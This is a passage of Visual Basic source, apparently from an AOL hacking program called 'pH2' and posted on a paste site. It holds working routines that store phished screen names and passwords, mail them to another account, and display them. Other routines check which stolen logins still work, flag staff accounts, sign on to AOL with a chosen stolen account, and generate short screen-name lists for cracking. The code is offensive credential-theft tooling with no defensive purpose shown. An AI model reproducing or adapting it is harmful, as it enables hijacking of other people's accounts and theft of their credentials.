  9422. For i = 0 To List1.ListCount - 1
  9423. imString$ = imString$ + vbCrLf + "• " & (i + 1) & " · " & List1.list(i) & ":" & List2.list(i) & ""
  9424. Next i
  9425.  
  9426. Call SendMail(screenname$, "• pH2 · All " + Typee$ + " accts", imString$)
  9427. End Sub
  9428.  
  9429. Public Sub SendSNMailAll(List1 As ListBox, screenname As String, Typee As String)
  9430. Dim imString As String, i As Long
  9431. imString$ = "• pH2 · all " + Typee$ + " sns"
  9432.  
  9433. For i = 0 To List1.ListCount - 1
  9434. imString$ = imString$ + vbCrLf + "• " & (i + 1) & " · " & List1.list(i) & ""
  9435. Next i
  9436.  
  9437. Call SendMail(screenname$, "• pH2 · all " + Typee$ + " sns", imString$)
  9438. End Sub
  9439.  
  9440. Public Sub SendPhishMailSelected(List1 As ListBox, List2 As ListBox, screenname As String, Typee As String)
  9441. Dim i As Long
  9442.  
  9443. i = List1.ListIndex
  9444. If i = -1 Then Exit Sub
  9445.  
  9446. Call SendMail(screenname$, "• pH2 · 1 " + Typee$ + " sn", "• pH2 · " + Typee$ + " · " & List1.list(i) & ":" & List2.list(i) & "")
  9447. End Sub
  9448.  
  9449. Public Sub SendSNMailSelected(List1 As ListBox, screenname As String, Typee As String)
  9450. Dim i As Long
  9451.  
  9452. i = List1.ListIndex
  9453. If i = -1 Then Exit Sub
  9454.  
  9455. Call SendMail(screenname$, "• pH2 · 1 " + Typee$ + " sn", "• pH2 · " + Typee$ + " · " & List1.list(i) & "")
  9456. End Sub
  9457.  
  9458. Public Sub EditPhish(List1 As ListBox, List2 As ListBox)
  9459. Dim Index As Long, NewSN As String, newpw As String
  9460.  
  9461. If List1.ListCount = 0& Or List1.ListIndex = -1 Then Exit Sub
  9462.  
  9463. Index& = List1.ListIndex
  9464.  
  9465. NewSN$ = InputBox("enter the new sn you want to use:", "edit account", List1.list(Index))
  9466. If NewSN$ = "" Then Exit Sub
  9467.  
  9468. newpw$ = InputBox("enter the new pw you want to use:", "edit account", List2.list(Index))
  9469. If newpw$ = "" Then Exit Sub
  9470.  
  9471. List1.list(Index) = NewSN$
  9472. List2.list(Index) = newpw$
  9473. End Sub
  9474.  
  9475. Public Sub PhishInfo(List1 As ListBox, List2 As ListBox, Typee As String, frm As Form)
  9476. Dim strPhish As String, i As Long
  9477.  
  9478. i = List1.ListIndex
  9479.  
  9480. If i = -1 Then Exit Sub
  9481.  
  9482. strPhish$ = "screen name: " + Chr(9) + List1.list(i) + vbCrLf
  9483. strPhish$ = strPhish$ + "password: " + Chr(9) + List2.list(i) + vbCrLf
  9484.  
  9485. strPhish$ = strPhish$ + "-------------------------" + vbCrLf
  9486.  
  9487. strPhish$ = strPhish$ + "type: " + Chr(9) + Chr(9) + Typee$ + vbCrLf
  9488. strPhish$ = strPhish$ + "index: " + Chr(9) + Chr(9) & (i + 1) & "/" & List1.ListCount & "" + vbCrLf
  9489.  
  9490. strPhish$ = strPhish$ + "-------------------------" + vbCrLf
  9491.  
  9492. If Typee$ = "guide" Or Typee$ = "host" Or Typee$ = "emp" Then
  9493. strPhish$ = strPhish$ + "empowered?: " + Chr(9) + "yes" + vbCrLf
  9494. Else
  9495. strPhish$ = strPhish$ + "empowered?: " + Chr(9) + "no" + vbCrLf
  9496. End If
  9497.  
  9498. strPhish$ = strPhish$ + "-------------------------" + vbCrLf
  9499.  
  9500. strPhish$ = strPhish$ + "length of sn: " + Chr(9) & Len(List1.list(i)) & vbCrLf
  9501. strPhish$ = strPhish$ + "length of pw: " + Chr(9) & Len(List2.list(i)) & vbCrLf
  9502.  
  9503. strPhish$ = strPhish$ + "-------------------------" + vbCrLf
  9504.  
  9505. If Len(List1.list(i)) > 16 Then
  9506. strPhish$ = strPhish$ + "valid sn length: " + Chr(9) + "no" + vbCrLf
  9507. Else
  9508. strPhish$ = strPhish$ + "valid sn length: " + Chr(9) + "yes" + vbCrLf
  9509. End If
  9510.  
  9511. If Len(List2.list(i)) > 8 Or Len(List2.list(i)) < 4 Then
  9512. strPhish$ = strPhish$ + "valid pw length: " + Chr(9) + "no" + vbCrLf
  9513. Else
  9514. strPhish$ = strPhish$ + "valid pw length: " + Chr(9) + "yes" + vbCrLf
  9515. End If
  9516.  
  9517. frm.WindowState = 1
  9518. frm.SetFocus
  9519. MsgBox strPhish$, vbInformation + vbOKOnly, "ph2 phish info"
  9520. frm.WindowState = 0
  9521. End Sub
  9522.  
  9523. Public Sub PhishMassAlive(List1 As ListBox, List2 As ListBox, Typee As String)
  9524. Dim i As Long, Room As String, mWin As Long, mBut As Long
  9525. Dim noModal As Long, NoButton As Long
  9526.  
  9527. Room$ = GetText(FindRoom&)
  9528.  
  9529. Call ChatSend("• pH2 · Mass alive activated")
  9530.  
  9531. For i& = 0 To List1.ListCount - 1
  9532. If i& = List1.ListCount Then Exit For
  9533. If PWC4(List1.list(i&), List2.list(i&)) = False Then
  9534. List1.RemoveItem i&
  9535. List2.RemoveItem i&
  9536. i& = i& - 1
  9537. Else
  9538. Call AddLogOn
  9539. If Room$ <> "" And GetUser$ <> "" Then
  9540. If AOLVersion = "4" Or AOLVersion = "5" Then
  9541. Call ToolKeyword("aol://2719:2-2-" + Room$)
  9542. Else
  9543. Call KeyWord25("aol://2719:2-2-" + Room$)
  9544. End If
  9545. Do
  9546. DoEvents
  9547. mWin& = FindWindow("#32770", "America Online")
  9548. mBut& = FindWindowEx(mWin&, 0&, "Button", "OK")
  9549. noModal& = FindWindow("_AOL_Modal", vbNullString)
  9550. NoButton& = FindWindowEx(noModal&, 0&, "_AOL_Button", "OK")
  9551. Loop Until mWin& <> 0& And mBut& <> 0& Or noModal& <> 0& And NoButton& <> 0& Or LTrim(GetText(FindRoom&)) = LTrim(Room$)
  9552.  
  9553. If FindRoom& <> 0& Then
  9554. If (i& + 1) = List1.ListCount Then
  9555. Call ChatSend("• pH2 · Mass alive complete")
  9556. Else
  9557. Call ChatSend("• pH2 · Mass alive " & (i& + 1) & "/" & List1.ListCount & "")
  9558. End If
  9559. ElseIf noModal& <> 0& Then
  9560. Call PostMessage(NoButton&, WM_KEYDOWN, VK_SPACE, 0&)
  9561. Call PostMessage(NoButton&, WM_KEYUP, VK_SPACE, 0&)
  9562. End If
  9563. End If
  9564. End If
  9565. Next i
  9566. End Sub
  9567.  
  9568. Public Sub PhishSignOnAll(List1 As ListBox, List2 As ListBox, Typee As String)
  9569. Dim i As Long, Room As String, mWin As Long, mBut As Long, SignOnLog As String
  9570. Dim Line1 As String, Line2 As String, Line3 As String, line4 As String
  9571. Dim line5 As String, Line6 As String, Line7 As String, Line8 As String
  9572. Dim NewPassword As String
  9573.  
  9574. Room$ = GetText(FindRoom&)
  9575.  
  9576. Call ChatSend("• pH2 · S/O All Activated · " + Typee$)
  9577.  
  9578. For i& = 0 To List1.ListCount - 1
  9579. If i& = List1.ListCount Then Exit For
  9580. If PWC4(List1.list(i&), List2.list(i&)) = False Then
  9581. List1.RemoveItem i&
  9582. List2.RemoveItem i&
  9583. i& = i& - 1
  9584. Else
  9585. If GetUser$ <> "" Then
  9586. Call AddLogOn
  9587. If Room$ <> "" Then
  9588. If AOLVersion = "4" Or AOLVersion = "5" Then
  9589. Call ToolKeyword("aol://2719:2-2-" + Room$)
  9590. Else
  9591. Call KeyWord25("aol://2719:2-2-" + Room$)
  9592. End If
  9593. Do
  9594. DoEvents
  9595. mWin& = FindWindow("#32770", "America Online")
  9596. mBut& = FindWindowEx(mWin&, 0&, "Button", "OK")
  9597. Loop Until mWin& <> 0& And mBut& <> 0& Or LTrim(GetText(FindRoom&)) = LTrim(Room$)
  9598.  
  9599. If FindRoom& <> 0& Then
  9600. If (i& + 1) = List1.ListCount Then
  9601. Call ChatSend("• pH2 · S/O All Complete")
  9602. Else
  9603. Call ChatSend("• pH2 · S/O All · " & (i& + 1) & "/" & List1.ListCount & "")
  9604. End If
  9605. End If
  9606. End If
  9607. End If
  9608. End If
  9609. Next i
  9610.  
  9611. If FindInvalidPW& <> 0& Then
  9612. Call PostMessage(FindWindowEx(FindInvalidPW&, 0&, "_AOL_Button", "Cancel"), WM_KEYDOWN, VK_SPACE, 0&)
  9613. Call PostMessage(FindWindowEx(FindInvalidPW&, 0&, "_AOL_Button", "Cancel"), WM_KEYUP, VK_SPACE, 0&)
  9614. End If
  9615.  
  9616. Call SignOff
  9617.  
  9618. End Sub
  9619.  
  9620. Public Sub KaiSignOn(List1 As ListBox, List2 As ListBox, Method As String, Typee As String)
  9621. Dim Index As Long, lngSignOn As Long, Room As String, mWin As Long, mBut As Long, TimeTaken As Double, StartTime As Double, SignOnLog As String, noModal As Long, NoButton As Long
  9622. Dim OldTime As String, strTimeTaken As String, handle As String, newpw As String
  9623. Dim Line1 As String, Line2 As String, Line3 As String, line4 As String, line5 As String, Line6 As String, Line7 As String, Line8 As String
  9624. Dim Returned As String, strKW As String
  9625.  
  9626. 'aol://2719:3-2214-
  9627. Index& = List1.ListIndex
  9628. If Index& = -1 Then Exit Sub
  9629.  
  9630. handle$ = GetFromINI("ph2", "handle", App.Path + "\ph2.ini")
  9631.  
  9632. Room$ = GetText(FindRoom&)
  9633. If Room$ = "" Then
  9634. Room$ = GetFromINI("ph2", "pr", App.Path + "\ph2.ini")
  9635. Returned$ = "Entered"
  9636. Else
  9637. Returned$ = "Returned"
  9638. End If
  9639.  
  9640. If LTrim(Room$) = "albuquerquechat" Then
  9641. strKW$ = "aol://2719:3-2214-"
  9642. Else
  9643. strKW$ = "aol://2719:2-2-"
  9644. End If
  9645.  
  9646. 'Call ChatSend("• pH2 · s/o " + Typee$ + ": " + List1.List(Index&) + " · " + Method$ + "")
  9647. Call ChatSend("• e-tank · account switch · " + Method$ + "")
  9648.  
  9649. StartTime = Timer
  9650.  
  9651. Select Case LCase(Method$)
  9652. Case "guest"
  9653. lngSignOn& = GuestSignOn(List1.list(Index&), List2.list(Index&))
  9654. Case "temp"
  9655. lngSignOn& = TempSignOn(List1.list(Index&), List2.list(Index&))
  9656. Case "quick"
  9657. lngSignOn& = SignOnQuick(List1.list(Index&), List2.list(Index&))
  9658. End Select
  9659. If lngSignOn& = 1& Then
  9660. If InStr(1, (Timer - StartTime), ".") <> 0& Then
  9661. TimeTaken = Left((Timer - StartTime) - 1, InStr(1, (Timer - StartTime), ".") + 2)
  9662. Else
  9663. TimeTaken = (Timer - StartTime) - 1
  9664. End If
  9665.  
  9666. Call AddLogOn
  9667.  
  9668. Call MsgKill
  9669. Call ModalKill
  9670.  
  9671. If Room$ <> "" And LCase(Typee$) <> "jacked" Then
  9672. If AOLVersion = "4" Or AOLVersion = "5" Then
  9673. Call ToolKeyword(strKW$ + "" + Room$)
  9674. GoTo AfterKW
  9675. End If
  9676. Do
  9677. DoEvents
  9678. Call Keyword(strKW$ + "" + Room$)
  9679. AfterKW:
  9680. Do
  9681. DoEvents
  9682. mWin& = FindWindow("#32770", "America Online")
  9683. mBut& = FindWindowEx(mWin&, 0&, "Button", "OK")
  9684. noModal& = FindWindow("_AOL_Modal", vbNullString)
  9685. NoButton& = FindWindowEx(noModal&, 0&, "_AOL_Button", "OK")
  9686. Loop Until mWin& <> 0& And mBut& <> 0& Or noModal& <> 0& And NoButton& <> 0& Or LTrim(GetText(FindRoom&)) = LTrim(Room$)
  9687.  
  9688. If mWin& <> 0& Then
  9689. Call PostMessage(mBut&, WM_KEYDOWN, VK_SPACE, 0&)
  9690. Call PostMessage(mBut&, WM_KEYUP, VK_SPACE, 0&)
  9691. ElseIf noModal& <> 0& Then
  9692. Call PostMessage(NoButton&, WM_KEYDOWN, VK_SPACE, 0&)
  9693. Call PostMessage(NoButton&, WM_KEYUP, VK_SPACE, 0&)
  9694. Else
  9695.  
  9696. End If
  9697. Loop Until LTrim(GetText(FindRoom&)) = LTrim(Room$)
  9698.  
  9699. strTimeTaken = Str(TimeTaken)
  9700. OldTime$ = GetFromINI("ph2", "signon", App.Path + "\ph2.ini")
  9701. If OldTime$ = "" Then
  9702. Call ChatSend("• pH2 · New Fastest Signon Time")
  9703. Call ChatSend("• pH2 · Old: none · New: " & TimeTaken & "s")
  9704. Call WritePrivateProfileString("ph2", "signon", strTimeTaken, App.Path + "\ph2.ini")
  9705. ElseIf TimeTaken < Val(OldTime$) Then
  9706. Call ChatSend("• pH2 · New Fastest Signon Time")
  9707. Call ChatSend("• pH2 · Old: " & OldTime$ & " · New: " & TimeTaken & "s")
  9708. Call WritePrivateProfileString("ph2", "signon", strTimeTaken, App.Path + "\ph2.ini")
  9709. Else
  9710. If Returned$ = "" Then Returned$ = "Entered"
  9711. Call ChatSend("• pH2 · " + handle$ + " Has " + Returned$ + " · " + Method$ + " " & TimeTaken & "s")
  9712. End If
  9713. End If
  9714.  
  9715. ElseIf lngSignOn& = 2 Then
  9716. MsgBox List1.list(Index&) + " has an invalid password.", vbCritical + vbOKOnly, "ph2"
  9717. List1.RemoveItem Index&
  9718. List2.RemoveItem Index&
  9719. ElseIf lngSignOn& = 3 Then
  9720. MsgBox List1.list(Index&) + " is currently signed on.", vbInformation + vbOKOnly, "ph2"
  9721. ElseIf lngSignOn& = 4 Then
  9722. MsgBox List1.list(Index&) + " is a dead or invalid account.", vbCritical + vbOKOnly, "ph2"
  9723. List1.RemoveItem Index&
  9724. List2.RemoveItem Index&
  9725. ElseIf lngSignOn& = 5 Then
  9726. MsgBox List1.list(Index&) + " is an internal account.", vbExclamation + vbOKOnly, "ph2"
  9727. End If
  9728. End Sub
  9729.  
  9730. Public Sub gen4chrs_AAAA(howmany As Long, list As Control)
  9731. Dim lngNum As Long
  9732. Dim first As Long, scnd As Long, third As Long, fourth As Long
  9733. Dim alph As String
  9734.  
  9735. For lngNum& = 1 To howmany&
  9736. Randomize
  9737. first& = Int(25 * Rnd) + 1
  9738. scnd& = Int(25 * Rnd) + 1
  9739. third& = Int(25 * Rnd) + 1
  9740. fourth& = Int(25 * Rnd) + 1
  9741. alph$ = "abcdefghijklmnopqrstuvwxyz"
  9742. list.AddItem Mid(alph$, first, 1) & Mid(alph$, scnd&, 1) & Mid(alph$, third&, 1) & Mid(alph$, fourth&, 1)
  9743. frmMain.lblTriers.Caption = cformat(list.ListCount)
  9744. Next lngNum&
  9745. End Sub
  9746.  
  9747. Public Sub gen6chrs(howmany As Long, list As Control)
  9748. Dim lngNum As Long
  9749. Dim first As Long, scnd As Long, third As Long, fourth As Long
  9750. Dim fifth As Long, sixth As Long
  9751. Dim alph As String
  9752.  
  9753. For lngNum& = 1 To howmany&
  9754. Randomize
  9755. first& = Int(25 * Rnd) + 1
  9756. scnd& = Int(25 * Rnd) + 1
  9757. third& = Int(25 * Rnd) + 1
  9758. fourth& = Int(25 * Rnd) + 1
  9759. fifth& = Int(25 * Rnd) + 1
  9760. sixth& = Int(25 * Rnd) + 1
  9761. alph$ = "abcdefghijklmnopqrstuvwxyz"
  9762. list.AddItem Mid(alph$, first, 1) & Mid(alph$, scnd&, 1) & Mid(alph$, third&, 1) & Mid(alph$, fourth&, 1) & Mid(alph$, fifth&, 1) & Mid(alph$, sixth&, 1)
  9763. frmMain.lblTriers.Caption = cformat(list.ListCount)
  9764. Next lngNum&
  9765. End Sub
  9766.  
  9767. Public Sub gen4chrs_A1AA(howmany As Long, list As Control)
  9768. Dim lngNum As Long
  9769. Dim first As Long, scnd As Long, third As Long, fourth As Long
  9770. Dim alph As String, alph2 As String
  9771.  
  9772. For lngNum& = 1 To howmany&
  9773. Randomize
  9774. first& = Int(25 * Rnd) + 1
  9775. scnd& = Int(9 * Rnd) + 1
  9776. third& = Int(25 * Rnd) + 1
  9777. fourth& = Int(25 * Rnd) + 1
  9778. alph$ = "abcdefghijklmnopqrstuvwxyz"
  9779. alph2$ = "1234567890"
  9780. list.AddItem Mid(alph$, first, 1) & Mid(alph2$, scnd&, 1) & Mid(alph$, third&, 1) & Mid(alph$, fourth&, 1)
  9781. frmMain.lblTriers.Caption = cformat(list.ListCount)
  9782. Next lngNum&
  9783. End Sub
  9784.  
  9785. Public Sub gen4chrs_AA1A(howmany As Long, list As Control)
  9786. Dim lngNum As Long
  9787. Dim first As Long, scnd As Long, third As Long, fourth As Long
  9788. Dim alph As String, alph2 As String
  9789.  
  9790. For lngNum& = 1 To howmany&
  9791. Randomize
  9792. first& = Int(25 * Rnd) + 1
  9793. scnd& = Int(25 * Rnd) + 1
  9794. third& = Int(9 * Rnd) + 1
  9795. fourth& = Int(25 * Rnd) + 1
  9796. alph$ = "abcdefghijklmnopqrstuvwxyz"
  9797. alph2$ = "1234567890"
  9798. list.AddItem Mid(alph$, first, 1) & Mid(alph$, scnd&, 1) & Mid(alph2$, third&, 1) & Mid(alph$, fourth&, 1)
  9799. frmMain.lblTriers.Caption = cformat(list.ListCount)
  9800. Next lngNum&
  9801. End Sub
  9802.  
  9803. Public Sub gen4chrs_A11A(howmany As Long, list As Control)
  9804. Dim lngNum As Long
  9805. Dim first As Long, scnd As Long, third As Long, fourth As Long
  9806. Dim alph As String, alph2 As String
  9807.  
  9808. For lngNum& = 1 To howmany&
  9809. Randomize
  9810. first& = Int(25 * Rnd) + 1
  9811. scnd& = Int(9 * Rnd) + 1
  9812. third& = Int(9 * Rnd) + 1
  9813. fourth& = Int(25 * Rnd) + 1
  9814. alph$ = "abcdefghijklmnopqrstuvwxyz"
  9815. alph2$ = "1234567890"
  9816. list.AddItem Mid(alph$, first, 1) & Mid(alph2$, scnd&, 1) & Mid(alph2$, third&, 1) & Mid(alph$, fourth&, 1)
  9817. frmMain.lblTriers.Caption = cformat(list.ListCount)
  9818. Next lngNum&
  9819. End Sub
  9820.  
  9821. Public Sub gen4chrs_A1A1(howmany As Long, list As Control)
  9822. Dim lngNum As Long
  9823. Dim first As Long, scnd As Long, third As Long, fourth As Long
  9824. Dim alph As String, alph2 As String
  9825.  
  9826. For lngNum& = 1 To howmany&
  9827. Randomize
  9828. first& = Int(25 * Rnd) + 1
  9829. scnd& = Int(9 * Rnd) + 1
  9830. third& = Int(25 * Rnd) + 1
  9831. fourth& = Int(9 * Rnd) + 1
  9832. alph$ = "abcdefghijklmnopqrstuvwxyz"
  9833. alph2$ = "1234567890"
  9834. list.AddItem Mid(alph$, first, 1) & Mid(alph2$, scnd&, 1) & Mid(alph$, third&, 1) & Mid(alph2$, fourth&, 1)
  9835. frmMain.lblTriers.Caption = cformat(list.ListCount)
  9836. Next lngNum&
  9837. End Sub
  9838.  
  9839. Public Sub gen4chrs_A111(howmany As Long, list As Control)
  9840. Dim lngNum As Long
  9841. Dim first As Long, scnd As Long, third As Long, fourth As Long
  9842. Dim alph As String, alph2 As String
  9843.  
  9844. For lngNum& = 1 To howmany&
  9845. Randomize
  9846. first& = Int(25 * Rnd) + 1
  9847. scnd& = Int(9 * Rnd) + 1
  9848. third& = Int(9 * Rnd) + 1
  9849. fourth& = Int(9 * Rnd) + 1
  9850. alph$ = "abcdefghijklmnopqrstuvwxyz"
  9851. alph2$ = "1234567890"
  9852. list.AddItem Mid(alph$, first, 1) & Mid(alph2$, scnd&, 1) & Mid(alph2$, third&, 1) & Mid(alph2$, fourth&, 1)
  9853. frmMain.lblTriers.Caption = cformat(list.ListCount)
  9854. Next lngNum&
  9855. End Sub
  9856.  
  9857. Public Sub gen4chrs_AA11(howmany As Long, list As Control)
  9858. Dim lngNum As Long
  9859. Dim first As Long, scnd As Long, third As Long, fourth As Long
  9860. Dim alph As String, alph2 As String
  9861.  
  9862. For lngNum& = 1 To howmany&
  9863. Randomize
  9864. first& = Int(25 * Rnd) + 1
  9865. scnd& = Int(25 * Rnd) + 1
  9866. third& = Int(9 * Rnd) + 1
  9867. fourth& = Int(9 * Rnd) + 1
  9868. alph$ = "abcdefghijklmnopqrstuvwxyz"
  9869. alph2$ = "1234567890"
  9870. list.AddItem Mid(alph$, first, 1) & Mid(alph$, scnd&, 1) & Mid(alph2$, third&, 1) & Mid(alph2$, fourth&, 1)
  9871. frmMain.lblTriers.Caption = cformat(list.ListCount)
  9872. Next lngNum&
  9873. End Sub
  9874.  
  9875. Public Sub gen4chrs_AAA1(howmany As Long, list As Control)
  9876. Dim lngNum As Long
  9877. Dim first As Long, scnd As Long, third As Long, fourth As Long
  9878. Dim alph As String, alph2 As String
  9879.  
  9880. For lngNum& = 1 To howmany&
  9881. Randomize
  9882. first& = Int(25 * Rnd) + 1
  9883. scnd& = Int(25 * Rnd) + 1
  9884. third& = Int(25 * Rnd) + 1
  9885. fourth& = Int(9 * Rnd) + 1
  9886. alph$ = "abcdefghijklmnopqrstuvwxyz"
  9887. alph2$ = "1234567890"
  9888. list.AddItem Mid(alph$, first, 1) & Mid(alph$, scnd&, 1) & Mid(alph$, third&, 1) & Mid(alph2$, fourth&, 1)
  9889. frmMain.lblTriers.Caption = cformat(list.ListCount)
  9890. Next lngNum&
  9891. End Sub
  9892.  
  9893. Public Sub gen4chrs_All(howmany As Long, list As Control)
  9894. Dim lngNum As Long
  9895. Dim first As Long, scnd As Long, third As Long, fourth As Long
  9896. Dim alph As String, alph2 As String
  9897.  
  9898. For lngNum& = 1 To howmany&
  9899. Randomize
  9900. first& = Int(25 * Rnd) + 1
  9901. scnd& = Int(35 * Rnd) + 1
  9902. third& = Int(35 * Rnd) + 1
  9903. fourth& = Int(35 * Rnd) + 1
  9904. alph$ = "abcdefghijklmnopqrstuvwxyz"
  9905. alph2$ = "abcdefghijklmnopqrstuvwxyz1234567890"
  9906. list.AddItem Mid(alph$, first, 1) & Mid(alph2$, scnd&, 1) & Mid(alph2$, third&, 1) & Mid(alph2$, fourth&, 1)
  9907. frmMain.lblTriers.Caption = cformat(list.ListCount)
  9908. Next lngNum&
  9909. End Sub
  9910.  
  9911. Public Sub gen3chrs(howmany As Long, list As Control)
  9912. Dim lngNum As Long
  9913. Dim first As Long, scnd As Long, third As Long
  9914. Dim alph As String
  9915.  
  9916. For lngNum& = 1 To howmany&
  9917. Randomize
  9918. first& = Int(25 * Rnd) + 1
  9919. scnd& = Int(25 * Rnd) + 1
  9920. third& = Int(25 * Rnd) + 1
  9921. alph$ = "abcdefghijklmnopqrstuvwxyz"
  9922. list.AddItem Mid(alph$, first, 1) & Mid(alph$, scnd&, 1) & Mid(alph$, third&, 1)
  9923. frmMain.lblTriers.Caption = cformat(list.ListCount)
  9924. Next lngNum&
  9925. End Sub
  9926.  
  9927. Public Sub gen3chrs_AAA(howmany As Long, list As Control)
  9928. Dim lngNum As Long
  9929. Dim first As Long, scnd As Long, third As Long
  9930. Dim alph As String, alph2 As String
  9931.  
  9932. For lngNum& = 1 To howmany&
  9933. Randomize
  9934. first& = Int(25 * Rnd) + 1
  9935. scnd& = Int(25 * Rnd) + 1
  9936. third& = Int(25 * Rnd) + 1
  9937. alph$ = "abcdefghijklmnopqrstuvwxyz"
  9938. alph2$ = "1234567890"
  9939. list.AddItem Mid(alph$, first, 1) & Mid(alph$, scnd&, 1) & Mid(alph$, third&, 1)
  9940. frmMain.lblTriers.Caption = cformat(list.ListCount)
  9941. Next lngNum&
  9942. End Sub
  9943.  
  9944. Public Sub gen3chrs_A1A(howmany As Long, list As Control)
  9945. Dim lngNum As Long
  9946. Dim first As Long, scnd As Long, third As Long
  9947. Dim alph As String, alph2 As String
  9948.  
  9949. For lngNum& = 1 To howmany&
  9950. Randomize
  9951. first& = Int(25 * Rnd) + 1
  9952. scnd& = Int(9 * Rnd) + 1
  9953. third& = Int(25 * Rnd) + 1
  9954. alph$ = "abcdefghijklmnopqrstuvwxyz"
  9955. alph2$ = "1234567890"
  9956. list.AddItem Mid(alph$, first, 1) & Mid(alph2$, scnd&, 1) & Mid(alph$, third&, 1)
  9957. frmMain.lblTriers.Caption = cformat(list.ListCount)
  9958. Next lngNum&
  9959. End Sub
  9960.  
  9961. Public Sub gen3chrs_A11(howmany As Long, list As Control)
  9962. Dim lngNum As Long
  9963. Dim first As Long, scnd As Long, third As Long
  9964. Dim alph As String, alph2 As String
  9965.  
  9966. For lngNum& = 1 To howmany&
  9967. Randomize
  9968. first& = Int(25 * Rnd) + 1
  9969. scnd& = Int(9 * Rnd) + 1
  9970. third& = Int(9 * Rnd) + 1
  9971. alph$ = "abcdefghijklmnopqrstuvwxyz"
  9972. alph2$ = "1234567890"
  9973. list.AddItem Mid(alph$, first, 1) & Mid(alph2$, scnd&, 1) & Mid(alph2$, third&, 1)
  9974. frmMain.lblTriers.Caption = cformat(list.ListCount)
  9975. Next lngNum&
  9976. End Sub
  9977.  
  9978. Public Sub gen3chrs_AA1(howmany As Long, list As Control)
  9979. Dim lngNum As Long
  9980. Dim first As Long, scnd As Long, third As Long
  9981. Dim alph As String, alph2 As String
  9982.  
  9983. For lngNum& = 1 To howmany&
  9984. Randomize
  9985. first& = Int(25 * Rnd) + 1
  9986. scnd& = Int(25 * Rnd) + 1
  9987. third& = Int(9 * Rnd) + 1
  9988. alph$ = "abcdefghijklmnopqrstuvwxyz"
  9989. alph2$ = "1234567890"
  9990. list.AddItem Mid(alph$, first, 1) & Mid(alph$, scnd&, 1) & Mid(alph2$, third&, 1)
  9991. frmMain.lblTriers.Caption = cformat(list.ListCount)
  9992. Next lngNum&
  9993. End Sub
  9994.  
  9995. Public Sub gen3chrs_All(howmany As Long, list As Control)
  9996. Dim lngNum As Long
  9997. Dim first As Long, scnd As Long, third As Long
  9998. Dim alph As String, alph2 As String
  9999.  
  10000. For lngNum& = 1 To howmany&
  10001. Randomize
  10002. first& = Int(25 * Rnd) + 1
  10003. scnd& = Int(35 * Rnd) + 1
  10004. third& = Int(35 * Rnd) + 1
  10005. alph$ = "abcdefghijklmnopqrstuvwxyz"
  10006. alph2$ = "abcdefghijklmnopqrstuvwxyz1234567890"
  10007. list.AddItem Mid(alph$, first, 1) & Mid(alph2$, scnd&, 1) & Mid(alph2$, third&, 1)
  10008. frmMain.lblTriers.Caption = cformat(list.ListCount)
  10009. Next lngNum&
  10010. End Sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement